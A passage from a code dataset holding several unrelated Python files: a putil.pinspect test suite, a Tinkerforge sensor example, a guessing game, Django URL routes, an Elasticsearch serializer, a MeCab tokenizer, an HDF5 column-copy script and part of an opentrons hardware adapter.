(407-412)'.format(cname))\n ref.append('{0}._set_rfilter: meth (413-417)'.format(cname))\n ref.append('{0}._add_dfilter_int: meth (418-460)'.format(cname))\n ref.append('{0}._apply_filter: meth (461-493)'.format(cname))\n ref.append('{0}._set_has_header: meth (494-497)'.format(cname))\n ref.append('{0}._validate_frow: meth (498-503)'.format(cname))\n ref.append('{0}._validate_rfilter: meth (504-537)'.format(cname))\n ref.append('{0}.add_dfilter: meth (538-561)'.format(cname))\n ref.append('{0}.cols: meth (562-581)'.format(cname))\n ref.append('{0}.data: meth (582-610)'.format(cname))\n ref.append('{0}.dsort: meth (611-663)'.format(cname))\n ref.append('{0}.header: meth (664-695)'.format(cname))\n ref.append('{0}.replace: meth (696-766)'.format(cname))\n ref.append('{0}.reset_dfilter: meth (767-784)'.format(cname))\n ref.append('{0}.rows: meth (785-804)'.format(cname))\n ref.append('{0}.write: meth (805-887)'.format(cname))\n ref.append('{0}.cfilter: prop (888-910)'.format(cname))\n ref.append('{0}.dfilter: prop (911-934)'.format(cname))\n ref.append('{0}.rfilter: prop (935-958)'.format(cname))\n ref_txt = '\\n'.join(ref)\n actual_txt = str(xobj)\n CS(actual_txt, ref_txt)\n #\n import tests.support.exdoc_support_module_1\n mname = 'tests.support.exdoc_support_module_1'\n xobj = putil.pinspect.Callables([modfile(mname)])\n ref = []\n cname = '{0}.ExceptionAutoDocClass'.format(mname)\n ref.append('Modules:')\n ref.append(' {0}'.format(mname))\n ref.append('Classes:')\n ref.append(' {0}'.format(cname))\n ref.append(' {0}.MyClass'.format(mname))\n ref.append('{0}._validate_arguments: func (17-31)'.format(mname))\n ref.append('{0}._write: func (32-36)'.format(mname))\n ref.append('{0}.write: func (37-50)'.format(mname))\n ref.append('{0}.read: func (51-62)'.format(mname))\n ref.append('{0}.probe: func (63-74)'.format(mname))\n ref.append('{0}.dummy_decorator1: func (75-79)'.format(mname))\n ref.append('{0}.dummy_decorator2: func (80-91)'.format(mname))\n ref.append('{0}.dummy_decorator2.wrapper: func (86-88)'.format(mname))\n ref.append('{0}.mlmdfunc: func (92-108)'.format(mname))\n ref.append('{0}: class (109-251)'.format(cname))\n ref.append('{0}.__init__: meth (112-124)'.format(cname))\n ref.append('{0}._del_value3: meth (125-132)'.format(cname))\n ref.append('{0}._get_value3: meth (133-141)'.format(cname))\n ref.append('{0}._set_value1: meth (142-152)'.format(cname))\n ref.append('{0}._set_value2: meth (153-166)'.format(cname))\n ref.append('{0}._set_value3: meth (167-177)'.format(cname))\n ref.append('{0}.add: meth (178-184)'.format(cname))\n ref.append('{0}.subtract: meth (185-191)'.format(cname))\n ref.append('{0}.multiply: meth (192-204)'.format(cname))\n ref.append('{0}.divide: meth (205-214)'.format(cname))\n ref.append('{0}.temp(getter): meth (215-219)'.format(cname))\n ref.append('{0}.temp(setter): meth (220-225)'.format(cname))\n ref.append('{0}.temp(deleter): meth (226-231)'.format(cname))\n ref.append('{0}.value1: prop (232-240)'.format(cname))\n ref.append('{0}.value2: prop (241-246)'.format(cname))\n ref.append('{0}.value3: prop (247-248)'.format(cname))\n ref.append('{0}.value4: prop (249-251)'.format(cname))\n ref.append('{0}.my_func: func (252-254)'.format(mname))\n ref.append('{0}.MyClass: class (255-259)'.format(mname))\n ref.append('{0}.MyClass.value: prop (259)'.format(mname))\n ref_txt = '\\n'.join(ref)\n actual_txt = str(xobj)\n CS(actual_txt, ref_txt)\n #\n import tests.test_exdoc\n mname = 'tests.test_exdoc'\n xobj = putil.pinspect.Callables([modfile(mname)])\n cname1 
= '{0}.TestExDocCxt'.format(mname)\n cname2 = '{0}.TestExDoc'.format(mname)\n mename1 = '{0}.test_multiple'.format(cname1)\n mename2 = '{0}.test_build_ex_tree'.format(cname2)\n meroot = '{0}.test_get_sphinx'.format(cname2)\n ref = []\n ref.append('Modules:')\n ref.append(' tests.test_exdoc')\n ref.append('Classes:')\n ref.append(' tests.test_exdoc.MockFCode')\n ref.append(' tests.test_exdoc.MockGetFrame')\n ref.append(' tests.test_exdoc.TestExDoc')\n ref.append(' tests.test_exdoc.TestExDocCxt')\n ref.append('tests.test_exdoc.exdocobj: func (50-83)')\n ref.append('tests.test_exdoc.exdocobj.multi_level_write: func (55-60)')\n ref.append('tests.test_exdoc.exdocobj_raised: func (84-97)')\n ref.append('tests.test_exdoc.exdocobj_single: func (98-107)')\n ref.append('tests.test_exdoc.simple_exobj: func (108-123)')\n ref.append('tests.test_exdoc.simple_exobj.func1: func (113-116)')\n ref.append('tests.test_exdoc.mock_getframe: func (124-127)')\n ref.append('tests.test_exdoc.trace_error_class: func (128-139)')\n ref.append('tests.test_exdoc.MockFCode: class (140-145)')\n ref.append('tests.test_exdoc.MockFCode.__init__: meth (141-145)')\n ref.append('tests.test_exdoc.MockGetFrame: class (146-153)')\n ref.append('tests.test_exdoc.MockGetFrame.__init__: meth (147-153)')\n ref.append('{0}: class (154-263)'.format(cname1))\n ref.append('{0}.test_init: meth (156-208)'.format(cname1))\n ref.append('{0}.test_init.check_ctx1: func (159-164)'.format(cname1))\n ref.append('{0}.test_init.check_ctx2: func (165-171)'.format(cname1))\n ref.append('{0}.test_init.func0: func (172-178)'.format(cname1))\n ref.append('{0}: meth (209-245)'.format(mename1))\n ref.append('{0}.func1: func (211-217)'.format(mename1))\n ref.append('{0}.test_trace: func (218-234)'.format(mename1))\n ref.append('{0}.test_save_callables: meth (246-263)'.format(cname1))\n ref.append('{0}: class (264-698)'.format(cname2))\n ref.append('{0}.test_init: meth (266-282)'.format(cname2))\n ref.append('{0}.test_copy: meth (283-296)'.format(cname2))\n ref.append('{0}: meth (297-395)'.format(mename2))\n ref.append('{0}.func1: func (304-307)'.format(mename2))\n ref.append('{0}.mock_add_nodes1: func (309-310)'.format(mename2))\n ref.append('{0}.mock_add_nodes2: func (311-312)'.format(mename2))\n ref.append('{0}.mock_add_nodes3: func (313-314)'.format(mename2))\n ref.append('{0}.test_depth: meth (396-403)'.format(cname2))\n ref.append('{0}.test_exclude: meth (404-411)'.format(cname2))\n ref.append('{0}_autodoc: meth (412-439)'.format(meroot))\n ref.append('{0}_doc: meth (440-698)'.format(meroot))\n ref_txt = '\\n'.join(ref)\n actual_txt = str(xobj)\n CS(actual_txt, ref_txt)\n #\n import tests.support.pinspect_support_module_4\n mname = 'tests.support.pinspect_support_module_4'\n xobj = putil.pinspect.Callables([modfile(mname)])\n ref = []\n fname = '{0}.another_property_action_enclosing_function'.format(mname)\n ref.append('Modules:')\n ref.append(' {0}'.format(mname))\n ref.append('{0}: func (16-24)'.format(fname))\n ref.append('{0}.fget: func (21-23)'.format(fname))\n ref_txt = '\\n'.join(ref)\n actual_txt = str(xobj)\n CS(actual_txt, ref_txt)\n # Test re-tries, should produce no action and raise no exception\n xobj = putil.pinspect.Callables([modfile(mname)])\n import tests.support.pinspect_support_module_10\n mname = 'tests.support.pinspect_support_module_10'\n xobj = putil.pinspect.Callables([modfile(mname)])\n ref = []\n cname = '{0}.AClass'.format(mname)\n ref.append('Modules:')\n ref.append(' {0}'.format(mname))\n ref.append('Classes:')\n 
ref.append(' {0}'.format(cname))\n ref.append(' {0}.method1.SubClass'.format(cname))\n ref.append('{0}: class (6-28)'.format(cname))\n ref.append('{0}.method1: meth (12-25)'.format(cname))\n ref.append('{0}.method1.func1: func (15-18)'.format(cname))\n ref.append('{0}.method1.SubClass: class (20-23)'.format(cname))\n ref.append('{0}.method1.SubClass.__init__: meth (22-23)'.format(cname))\n ref.append('{0}.method2: meth (26-28)'.format(cname))\n ref_txt = '\\n'.join(ref)\n actual_txt = str(xobj)\n CS(actual_txt, ref_txt)\n\n\n def test_callables_db(self):\n \"\"\" Test callables_db property \"\"\"\n import tests.support.pinspect_support_module_4\n mname = 'tests.support.pinspect_support_module_4'\n xobj = putil.pinspect.Callables([modfile(mname)])\n pkg_dir = os.path.dirname(__file__)\n ref = {\n 'tests.support.pinspect_support_module_4.'\n 'another_property_action_enclosing_function': {\n 'code_id': (\n os.path.join(\n pkg_dir,\n 'support',\n 'pinspect_support_module_4.py'\n ), 16\n ),\n 'last_lineno': 21,\n 'name': 'pinspect_support_module_4.'\n 'another_property_action_enclosing_function',\n 'type': 'func'\n },\n 'tests.support.pinspect_support_module_4.'\n 'another_property_action_enclosing_function.fget': {\n 'code_id': (\n os.path.join(\n pkg_dir,\n 'support',\n 'pinspect_support_module_4.py'\n ), 18\n ),\n 'last_lineno': 20,\n 'name': 'pinspect_support_module_4.'\n 'another_property_action_enclosing_function.fget',\n 'type': 'func'\n }\n }\n assert sorted(xobj.callables_db) == sorted(ref)\n ref = {\n (\n os.path.join(\n pkg_dir,\n 'support',\n 'pinspect_support_module_4.py'\n ),\n 16\n ): (\n 'pinspect_support_module_4.'\n 'another_property_action_enclosing_function'\n ),\n (\n os.path.join(\n pkg_dir,\n 'support',\n 'pinspect_support_module_4.py'\n ),\n 21\n ): (\n 'pinspect_support_module_4.'\n 'another_property_action_enclosing_function.fget'\n )\n }\n assert sorted(xobj.reverse_callables_db) == sorted(ref)\n\n def test_get_callable_from_line(self):\n \"\"\" Test get_callable_from_line() function \"\"\"\n xobj = putil.pinspect.Callables()\n import tests.support.pinspect_support_module_4\n fname = modfile('tests.support.pinspect_support_module_4')\n ref = ('tests.support.pinspect_support_module_4.'\n 'another_property_action_enclosing_function')\n assert xobj.get_callable_from_line(fname, 16) == ref\n xobj = putil.pinspect.Callables([fname])\n ref = ('tests.support.pinspect_support_module_4.'\n 'another_property_action_enclosing_function')\n assert xobj.get_callable_from_line(fname, 16) == ref\n ref = ('tests.support.pinspect_support_module_4.'\n 'another_property_action_enclosing_function')\n assert xobj.get_callable_from_line(fname, 17) == ref\n ref = ('tests.support.pinspect_support_module_4.'\n 'another_property_action_enclosing_function')\n assert xobj.get_callable_from_line(fname, 24) == ref\n ref = ('tests.support.pinspect_support_module_4.'\n 'another_property_action_enclosing_function.fget')\n assert xobj.get_callable_from_line(fname, 21) == ref\n ref = ('tests.support.pinspect_support_module_4.'\n 'another_property_action_enclosing_function.fget')\n assert xobj.get_callable_from_line(fname, 22) == ref\n ref = ('tests.support.pinspect_support_module_4.'\n 'another_property_action_enclosing_function.fget')\n assert xobj.get_callable_from_line(fname, 23) == ref\n ref = 'tests.support.pinspect_support_module_4'\n assert xobj.get_callable_from_line(fname, 100) == ref\n\n\n##\n# Tests for get_function_args()\n###\nclass TestGetFunctionArgs(object):\n \"\"\" Tests for 
get_function_args function \"\"\"\n def test_all_positional_arguments(self):\n \"\"\"\n Test that function behaves properly when all arguments are positional\n arguments\n \"\"\"\n def func(ppar1, ppar2, ppar3):\n pass\n obj = putil.pinspect.get_function_args\n assert obj(func) == ('ppar1', 'ppar2', 'ppar3')\n\n def test_all_keyword_arguments(self):\n \"\"\"\n Test that function behaves properly when all arguments are keywords\n arguments\n \"\"\"\n def func(kpar1=1, kpar2=2, kpar3=3):\n pass\n obj = putil.pinspect.get_function_args\n assert obj(func) == ('kpar1', 'kpar2', 'kpar3')\n\n def test_positional_and_keyword_arguments(self):\n \"\"\"\n Test that function behaves properly when arguments are a mix of\n positional and keywords arguments\n \"\"\"\n def func(ppar1, ppar2, ppar3, kpar1=1, kpar2=2, kpar3=3, **kwargs):\n pass\n assert putil.pinspect.get_function_args(func) == (\n 'ppar1', 'ppar2', 'ppar3', 'kpar1', 'kpar2', 'kpar3', '**kwargs'\n )\n assert putil.pinspect.get_function_args(func, no_varargs=True) == (\n 'ppar1', 'ppar2', 'ppar3', 'kpar1', 'kpar2', 'kpar3'\n )\n\n def test_no_arguments(self):\n \"\"\"\n Test that function behaves properly when there are no arguments\n passed\n \"\"\"\n def func():\n pass\n assert putil.pinspect.get_function_args(func) == ()\n\n def test_no_self(self):\n \"\"\"\n Test that function behaves properly when there are no arguments\n passed\n \"\"\"\n class MyClass(object):\n def __init__(self, value, **kwargs):\n pass\n obj = partial(putil.pinspect.get_function_args, MyClass.__init__)\n assert obj() == ('self', 'value', '**kwargs')\n assert obj(no_self=True) == ('value', '**kwargs')\n assert obj(no_self=True, no_varargs=True) == ('value', )\n assert obj(no_varargs=True) == ('self', 'value')\n\n def test_nonzero(self):\n \"\"\" Test __nonzero__() function \"\"\"\n obj = putil.pinspect.Callables()\n assert not obj\n obj.trace([modfile('putil.test')])\n assert obj\n","sub_path":"tests/test_pinspect.py","file_name":"test_pinspect.py","file_ext":"py","file_size_in_byte":34187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"333169420","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- \n\nHOST = \"localhost\"\nPORT = 4223\nUID = \"abcde\" # Change to your UID\n\nfrom tinkerforge.ip_connection import IPConnection\nfrom tinkerforge.bricklet_temperature_ir import TemperatureIR\n\n# Callback for object temperature greater than 100 °C\n# (parameter has unit °C/10)\ndef cb_reached(temperature):\n print('The surface has a temperature of ' + str(temperature/10.0) + ' °C.')\n print('The water is boiling!')\n\nif __name__ == \"__main__\":\n ipcon = IPConnection() # Create IP connection\n tir = TemperatureIR(UID, ipcon) # Create device object\n\n ipcon.connect(HOST, PORT) # Connect to brickd\n # Don't use device before ipcon is connected\n\n # Set emissivity to 0.98 (emissivity of water)\n tir.set_emissivity(int(0xFFFF*0.98))\n\n # Get threshold callbacks with a debounce time of 10 seconds (10000ms)\n tir.set_debounce_period(10000)\n\n # Register threshold reached callback to function cb_reached\n tir.register_callback(tir.CALLBACK_OBJECT_TEMPERATURE_REACHED, cb_reached)\n\n # Configure threshold for \"greater than 100 °C\" (unit is °C/10)\n tir.set_object_temperature_callback_threshold('>', 100*10, 0)\n\n raw_input('Press key to exit\\n') # Use input() in Python 3\n 
ipcon.disconnect()\n","sub_path":"software/examples/python/example_water_boiling.py","file_name":"example_water_boiling.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"57332948","text":"from time import sleep\r\nfrom random import randint\r\n\r\nprint('PENSANDO EM UM NÚMERO ENTRE 0 E 10... TENTE ADIVINHÁ-LO!')\r\nsleep(3)\r\ncomputador = randint(0, 10) # Randomiza um número entre 0 e 10.\r\n\r\nflag = 1\r\ntentativas = 0 # Tentativas até acertar.\r\nwhile flag != 0:\r\n resposta = int(input('Em que número eu pensei? '))\r\n tentativas += 1 # Adiciona mais uma tentativa.\r\n\r\n if resposta != computador: # Se a resposta for diferente.\r\n print('\\nFelizmente não foi esse. Tente novamente.')\r\n if computador < resposta:\r\n print('Dica: eu acho que é menos...\\n')\r\n elif computador > resposta:\r\n print('Dica: eu acho que é mais...\\n')\r\n\r\n else: # Se não for igual, acerta.\r\n # Verifica as condições para a resposta apropriada.\r\n if tentativas == 1:\r\n print('Parabéns, você acertou de primeira!')\r\n else:\r\n print('Parabéns, você acertou!\\n'\r\n f'Mas você precisou de {tentativas} tentativas.')\r\n\r\n flag = 0 # A flag recebe 0 e o laço é quebrado.\r\n","sub_path":"ex058.py","file_name":"ex058.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"408608854","text":"from django.conf.urls import url\n\nfrom .views import ( BookCreate, BookUpdate,\n BookDelete,BookList,\n book_detail, DvdList,\n DvdCreate,DvdUpdate,\n DvdDelete, dvd_detail, Catalog)\n\nurlpatterns = [\n url(r'^$',\n Catalog.as_view(),\n name='catalog_view'),\n url(r'^dvd/$',\n DvdList.as_view(),\n name='dvd_list'),\n url(r'^dvd/create/$',\n DvdCreate.as_view(),\n name='dvd_create'),\n url(r'^dvd/(?P[\\w\\-]+)/$',\n dvd_detail,\n name='dvd_detail'),\n url(r'^dvd/(?P[\\w\\-]+)/update/$',\n DvdUpdate.as_view(),\n name='dvd_update'),\n url(r'^dvd/(?P[\\w\\-]+)/delete/$',\n DvdDelete.as_view(),\n name='dvd_delete'),\n url(r'^book/$',\n BookList.as_view(),\n name='book_list'),\n url(r'^book/create/$',\n BookCreate.as_view(),\n name='book_create'),\n url(r'^book/(?P[\\w\\-]+)/$',\n book_detail,\n name='book_detail'),\n url(r'^book/(?P[\\w\\-]+)/update/$',\n BookUpdate.as_view(),\n name='book_update'),\n url(r'^book/(?P[\\w\\-]+)/delete/$',\n BookDelete.as_view(),\n name='book_delete'),\n ]\n","sub_path":"catalog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"606776199","text":"\"\"\" JSON serializer for Elasticsearch use\n\"\"\"\nfrom datetime import date, datetime\nfrom decimal import Decimal\n\nfrom elasticsearch.serializer import JSONSerializer\n\n\nclass CMRESSerializer(JSONSerializer):\n \"\"\" JSON serializer inherited from the elastic search JSON serializer\n\n Allows to serialize logs for a elasticsearch use.\n Manage the record.exc_info containing an exception type.\n \"\"\"\n def default(self, data):\n \"\"\" Default overrides the elasticsearch default method\n\n Allows to transform unknown types into strings\n\n :params data: The data to serialize before sending it to elastic search\n \"\"\"\n result = None\n if isinstance(data, (date, datetime)):\n result = data.isoformat()\n elif isinstance(data, Decimal):\n result = float(data)\n else:\n result = str(data)\n return 
result\n","sub_path":"cmreslogging/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"271805060","text":"import MeCab\n\nclass Tokenizer:\n def __init__(self, dict_path=\"\", add_stopwords=[]):\n self.stopwords = self.read_stopwords()\n self.stopwords += add_stopwords\n self.mecab = MeCab.Tagger(dict_path)\n \n \n def read_stopwords(self):\n stopwords = ['あそこ', 'あたり', 'あちら', 'あっち', 'あと', 'あな', 'あなた', 'あれ', 'いくつ', 'いつ', 'いま', 'いや', 'いろいろ', 'うち',\n 'おおまか', 'おまえ', 'おれ', 'がい', 'かく', 'かたち', 'かやの', 'から', 'がら', 'きた', 'くせ', 'ここ', 'こっち', 'こと', \n 'ごと','こちら', 'ごっちゃ', 'これ', 'これら', 'ごろ', 'さまざ��', 'さらい', 'さん', 'しかた', 'しよう', 'すか', 'ずつ', 'すね', \n 'すべて', 'ぜんぶ', 'そう', 'そこ', 'そちら', 'そっち', 'そで', 'それ', 'それぞれ', 'それなり', 'たくさん', 'たち', 'たび', \n 'ため', 'だめ', 'ちゃ', 'ちゃん', 'てん', 'とおり', 'とき', 'どこ', 'どこか', 'ところ', 'どちら', 'どっか', 'どっち', 'どれ', \n 'なか', 'なかば', 'なに', 'など', 'なん', 'はじめ', 'はず', 'はるか', 'ひと', 'ひとつ', 'ふく', 'ぶり', 'べつ', 'へん', \n 'ぺん', 'ほう', 'ほか', 'まさ', 'まし', 'まとも', 'まま', 'みたい', 'みつ', 'みなさん', 'みんな', 'もと', 'もの', 'もん', \n 'やつ', 'よう', 'よそ', 'わけ', 'わたし', '', 'ハイ', '', '', '上', '中', '下', '字', '', '', '年', '月', '日', '時',\n '分', '秒', '週', '火', '水', '木', '金', '土', '国', '都', '道', '府', '県', '市', '区', '町', '村', '', '', '各',\n '第', '方', '何', '的', '度', '文', '者', '性', '体', '人', '他', '今', '部', '課', '係', '外', '類', '達', '気', \n '室', '口', '誰', '用', '界', '会', '首', '男', '女', '別', '話', '私', '屋', '店', '家', '場', '等', '見', '際', \n '観', '段', '略', '例', '系', '論', '形', '間', '地', '員', '線', '点', '書', '品', '力', '法', '感', '作', '元', \n '手', '数', '彼', '彼女', '子', '内', '楽', '喜', '怒', '哀', '輪', '頃', '化', '境', '俺', '奴', '高', '校', '婦',\n '伸', '紀', '誌', 'レ', '行', '列', '事', '士', '台', '集', '様', '所', '歴', '器', '名', '情', '連', '毎', '式', \n '簿', '回', '匹', '個', '席', '束', '歳', '目', '通', '面', '円', '玉', '枚', '前', '後', '左',\n '右', '次', '先', '春', '夏', '秋', '冬', '一', '二', '三', '四', '五', '六', '七', '八', '九', \n '十', '百', '千', '万', '億', '兆', '', '', '下記', '上記', '時間', '今回', '前回', '場合', '一つ', '年生', '自分', \n 'ヶ所', 'ヵ所', 'カ所', '箇所', 'ヶ月', 'ヵ月', 'カ月', '箇月', '名前', '本当', '確か', '時点', '全部', '関係', '近く', \n '方法', '我々', '違い', '多く', '扱い', '新た', 'その後', '半ば', '結局', '様々', '以前', '以後', '以降', '未満', '以上',\n '以下', '幾つ', '毎日', '自体', '向こう', '何人', '手段', '同じ', '感じ']\n return stopwords\n \n \n def mecab_tokenizer(self, text, hinshi_list=['名詞', '形容詞', '動詞']):\n node = self.mecab.parseToNode(text)\n subtype_list = ['数', '非自立', '代名詞','接尾']\n output = []\n \n while node:\n if node.surface != '':\n wordtype = node.feature.split(',')[0]\n subtype = node.feature.split(',')[1]\n original = node.feature.split(',')[6]\n \n if (wordtype in hinshi_list) and (subtype not in subtype_list) and (original not in self.stopwords):\n if original != '*':\n output.append(original)\n \n # 未知語\n else:\n output.append(node.surface)\n \n node = node.next\n if node is None:\n break\n \n return output\n \n \n def tokenize_df(self, df, hinsi_list=['名詞', '形容詞', '動詞'], col_names=['user_description', 'text']): \n token_dic = {}\n for col in col_names:\n df[col] = df[col].apply(lambda x: self.mecab_tokenizer(x, hinsi_list))\n token_dic[col] = df[col].values.tolist()\n \n return token_dic","sub_path":"tokenizer/tokenizer.py","file_name":"tokenizer.py","file_ext":"py","file_size_in_byte":4833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"638065010","text":"import pandas as pd\n\nimport numpy as np\nimport os, sys\nfrom glob import 
glob\nfrom copy import copy\nfrom array import array\nsys.path.insert(0, 'nTupleAnalysis/python/') #https://github.com/patrickbryant/nTupleAnalysis\n\nimport multiprocessing\nimport argparse\nparser = argparse.ArgumentParser(description='Copy a subset of columns from picoAOD h5 files.')\nparser.add_argument('-i', '--inFile', default='/uscms/home/bryantp/nobackup/ZZ4b/data2018*/picoAOD.h5', type=str, help='Input h5 File.')\nparser.add_argument('-o', '--outputName', default='', type=str, help='Output root File dir.')\nparser.add_argument('-d', '--debug', dest=\"debug\", action=\"store_true\", default=False, help=\"debug\")\nparser.add_argument( '--varList', default=None, help=\"comma separated list of variables\")\nargs = parser.parse_args()\n\ninPaths = args.inFile.split()\ninFiles = []\nfor path in inPaths:\n    if \"root://\" in path:\n        inFiles.append(path)\n    else:\n        inFiles += glob(path)\nprint(inFiles)\n\n\nfor f in inFiles:\n    h5FileIn = f\n    h5FileOut = h5FileIn.replace(\".h5\",\"_\"+args.outputName+\".h5\")\n    print(\"Reading\",h5FileIn)\n    storeIn = pd.HDFStore(h5FileIn, 'r')\n\n    nrows = int(storeIn.get_storer('df').nrows)\n    ncols = int(storeIn.get_storer('df').ncols)\n    print(\"Input: nrows\", nrows, \"ncols\",ncols)\n    df = storeIn.select('df', start=0, stop=1)\n\n    chunksize = 1e4\n\n    print(\"Writing\",h5FileOut)\n    storeOut = pd.HDFStore(h5FileOut ,mode='w')\n\n    data = {}\n    #varList = \"DvT3_DataVsTT_3b_pt3\"\n    varsToCopy = args.varList.split(\",\") + [\"dRjjClose\"]\n    print(\"Variable output:\")\n    for v in varsToCopy:\n        print(\"\\t\",v)\n\n    dfOut = None\n\n    for chunk in range(int(nrows//chunksize) + 1):\n        start, stop= int(chunk*chunksize), int((chunk+1)*chunksize)\n        df = storeIn.select('df', start=start, stop=stop)\n\n        if dfOut is None: dfOut = df[varsToCopy]\n        else:            dfOut = dfOut.append(df[varsToCopy])\n\n\n    \n    storeOut.append('df', dfOut, format='table', data_columns=None, index=False)\n    storeOut.close()\n\n    #\n    # Test\n    #\n    storeTest = pd.HDFStore(h5FileOut, 'r')\n    nrows = int(storeTest.get_storer('df').nrows)\n    ncols = int(storeTest.get_storer('df').ncols)\n    print(\"Output: nrows\", nrows, \"ncols\",ncols)\n\n    print(\"converted:\",f)\n    \nprint(\"done\")\n","sub_path":"nTupleAnalysis/scripts/convert_h52h5.py","file_name":"convert_h52h5.py","file_ext":"py","file_size_in_byte":2299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"30853599","text":"\"\"\" Adapters for the :py:class:`.hardware_control.API` instances.\n\"\"\"\nimport asyncio\nimport copy\nimport functools\nimport threading\nfrom typing import List, Mapping\n\nfrom . import API\nfrom .types import Axis, HardwareAPILike\n\n\nclass SynchronousAdapter(HardwareAPILike, threading.Thread):\n    \"\"\" A wrapper to make every call into :py:class:`.hardware_control.API`\n    synchronous.\n\n    Example\n    -------\n    .. 
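# The conversion script above walks an HDF5 table in fixed-size row windows.
# The boundary arithmetic in isolation, as a pure-Python sketch with a guard
# for the final partial chunk (function name is illustrative):
def chunk_ranges(nrows, chunksize):
    for chunk in range(nrows // chunksize + 1):
        start, stop = chunk * chunksize, (chunk + 1) * chunksize
        if start < nrows:
            yield start, min(stop, nrows)

print(list(chunk_ranges(10, 4)))  # [(0, 4), (4, 8), (8, 10)]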
code-block::\n        >>> import opentrons.hardware_control as hc\n        >>> import opentrons.hardware_control.adapters as adapts\n        >>> api = hc.API.build_hardware_simulator()\n        >>> synch = adapts.SynchronousAdapter(api)\n        >>> synch.home()\n    \"\"\"\n\n    @classmethod\n    def build(cls, builder, *args, build_loop=None, **kwargs):\n        \"\"\" Build a hardware control API and initialize the adapter in one call\n\n        :param builder: the builder method to use (e.g.\n                        :py:meth:`hardware_control.API.build_hardware_simulator`)\n        :param args: Args to forward to the builder method\n        :param kwargs: Kwargs to forward to the builder method\n        \"\"\"\n        loop = asyncio.new_event_loop()\n        kwargs['loop'] = loop\n        args = [arg for arg in args\n                if not isinstance(arg, asyncio.AbstractEventLoop)]\n        if asyncio.iscoroutinefunction(builder):\n            checked_loop = build_loop or asyncio.get_event_loop()\n            api = checked_loop.run_until_complete(builder(*args, **kwargs))\n        else:\n            api = builder(*args, **kwargs)\n        return cls(api, loop)\n\n    def __init__(self,\n                 api: API,\n                 loop: asyncio.AbstractEventLoop = None) -> None:\n        \"\"\" Build the SynchronousAdapter.\n\n        :param api: The API instance to wrap\n        :param loop: A specific event loop to use. This is for the use of\n                     :py:meth:`build` and should normally not be used; since\n                     this loop will be run in a worker thread it should not\n                     be run elsewhere. If not specified (which should be the\n                     normal use case) the adapter will start a new event loop\n                     for the worker thread.\n        \"\"\"\n        checked_loop = loop or asyncio.new_event_loop()\n        api.set_loop(checked_loop)\n        self._loop = checked_loop\n        self._api = api\n        self._call_lock = threading.Lock()\n        self._cached_sync_mods: Mapping[str, SynchronousAdapter] = {}\n        super().__init__(\n            target=self._event_loop_in_thread,\n            name='SynchAdapter thread for {}'.format(repr(api)))\n        super().start()\n\n    def __repr__(self):\n        return '<SynchronousAdapter>'\n\n    def _event_loop_in_thread(self):\n        loop = object.__getattribute__(self, '_loop')\n        loop.run_forever()\n        loop.close()\n\n    def join(self):\n        thread_loop = object.__getattribute__(self, '_loop')\n        if thread_loop.is_running():\n            thread_loop.call_soon_threadsafe(lambda: thread_loop.stop())\n        super().join()\n\n    def __del__(self):\n        try:\n            thread_loop = object.__getattribute__(self, '_loop')\n        except AttributeError:\n            pass\n        else:\n            if thread_loop.is_running():\n                thread_loop.call_soon_threadsafe(lambda: thread_loop.stop())\n\n    def discover_modules(self):\n        loop = object.__getattribute__(self, '_loop')\n        api = object.__getattribute__(self, '_api')\n        discovered_mods = self.call_coroutine_sync(loop, api.discover_modules)\n        async_mods = {mod.port: mod for mod in discovered_mods}\n\n        these = set(async_mods.keys())\n        known = set(self._cached_sync_mods.keys())\n        new = these - known\n        gone = known - these\n\n        for mod_port in gone:\n            self._cached_sync_mods.pop(mod_port)\n        for mod_port in new:\n            self._cached_sync_mods[mod_port] \\\n                = SynchronousAdapter(async_mods[mod_port])\n\n        return list(self._cached_sync_mods.values())\n\n    @staticmethod\n    def call_coroutine_sync(loop, to_call, *args, **kwargs):\n        fut = asyncio.run_coroutine_threadsafe(to_call(*args, **kwargs), loop)\n        return fut.result()\n\n    def __getattribute__(self, attr_name):\n        \"\"\" Retrieve attributes from our API and wrap coroutines \"\"\"\n        # Almost every attribute retrieved from us will be for people actually\n        # looking for an attribute of the hardware API, so check there first.\n        if attr_name == 'discover_modules':\n            return object.__getattribute__(self, attr_name)\n\n        api = 
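# SynchronousAdapter's core trick is an event loop running on a worker thread
# plus asyncio.run_coroutine_threadsafe. A self-contained minimal sketch of
# that pattern (the coroutine and names here are hypothetical, not from the
# opentrons source):
import asyncio
import threading

loop = asyncio.new_event_loop()
threading.Thread(target=loop.run_forever, daemon=True).start()

async def add(a, b):
    return a + b

# Submit from the calling thread; block on the concurrent.futures.Future.
fut = asyncio.run_coroutine_threadsafe(add(2, 3), loop)
print(fut.result())  # 5, computed on the worker thread's loop
loop.call_soon_threadsafe(loop.stop)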
object.__getattribute__(self, '_api')\n try:\n attr = getattr(api, attr_name)\n except AttributeError:\n # Maybe this actually was for us? Let’s find it\n return object.__getattribute__(self, attr_name)\n\n try:\n check = attr.__wrapped__\n except AttributeError:\n check = attr\n loop = object.__getattribute__(self, '_loop')\n if asyncio.iscoroutinefunction(check):\n # Return a synchronized version of the coroutine\n return functools.partial(self.call_coroutine_sync, loop, attr)\n elif asyncio.iscoroutine(check):\n # Catch awaitable properties and reify the future before returning\n fut = asyncio.run_coroutine_threadsafe(check, loop)\n return fut.result()\n\n return attr\n\n\nclass SingletonAdapter(HardwareAPILike):\n \"\"\" A wrapper to use as a global singleton to control hardware.\n\n This wrapper adds some useful utility functions to defer initialization\n of true hardware controllers (to cut down on work at module import time)\n and in general ease the transition away from the direct use of the old\n robot singleton.\n\n When the :py:class:`SingletonAdapter` is initialized, it will make a\n hardware simulator instance. When :py:meth:`connect` is called, 